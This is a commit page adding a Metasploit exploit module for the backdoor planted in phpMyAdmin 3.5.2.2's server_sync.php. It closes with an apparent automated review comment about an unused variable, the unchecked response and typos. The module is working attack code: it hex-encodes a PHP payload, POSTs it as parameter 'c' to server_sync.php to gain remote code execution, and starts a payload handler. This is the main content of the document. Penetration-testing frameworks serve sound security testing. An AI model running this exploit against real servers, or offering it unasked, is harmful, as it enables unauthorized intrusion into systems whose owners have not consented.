
Add exploit for phpmyadmin backdoor

commit 3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d 1 parent 93dd96d
HD Moore hmoore-r7 authored
Showing with 82 additions and 0 deletions.
  1. +82 −0 modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
82 modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
@@ -0,0 +1,82 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
+ 'Description' => %q{
+ This module exploits an arbitrary code execution backdoor
+ placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
+ },
+ 'Author' => [ 'hdm' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'ConnectionType' => 'find',
+ },
+ # Arbitrary big number. The payload gets sent as an HTTP
+ # response body, so really it's unlimited
+ 'Space' => 262144, # 256k
+ },
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 30
+ },
+ 'DisclosureDate' => 'Sep 25 2012',
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
+ ], self.class)
+ end
+
+ def exploit
+
+ uris = []
+
+ tpath = datastore['PATH']
+ if tpath[-1,1] == '/'
+ tpath = tpath.chop
+ end
+
+ pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")
+
+ res = send_request_raw( {
+ 'global' => true,
+ 'uri' => tpath + "/server_sync.php",
+ 'method' => 'POST',
+ 'data' => pdata,
+ 'headers' => {
+ 'Content-Type' => 'application/x-www-form-urlencoded',
+ 'Content-Length' => pdata.length,
+ }
+ }, 1.0)
+
+ handler
+ end
+end
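Review bot: In `exploit`, the value assigned to `res` from `send_request_raw` is never inspected and `uris = []` is never used, so a refused connection or a 404 for `server_sync.php` is indistinguishable from a delivered request and the run simply waits out the 30-second `WfsDelay`. I would drop the `uris` line and report the outcome after the request, e.g. `print_status("server_sync.php returned HTTP #{res.code}") if res`; a nil `res` after the 1.0-second timeout may be normal here, so it should not be treated as a failure without confirming. The explicit `'Content-Length'` header is probably redundant because the HTTP client normally computes it from `data`, and `include Msf::Exploit::Remote::Tcp` looks unnecessary next to `HttpClient`; both are worth confirming against the framework. Separately, the `Description` contains the typo "thorugh" and the `PATH` option text ends in a stray "try".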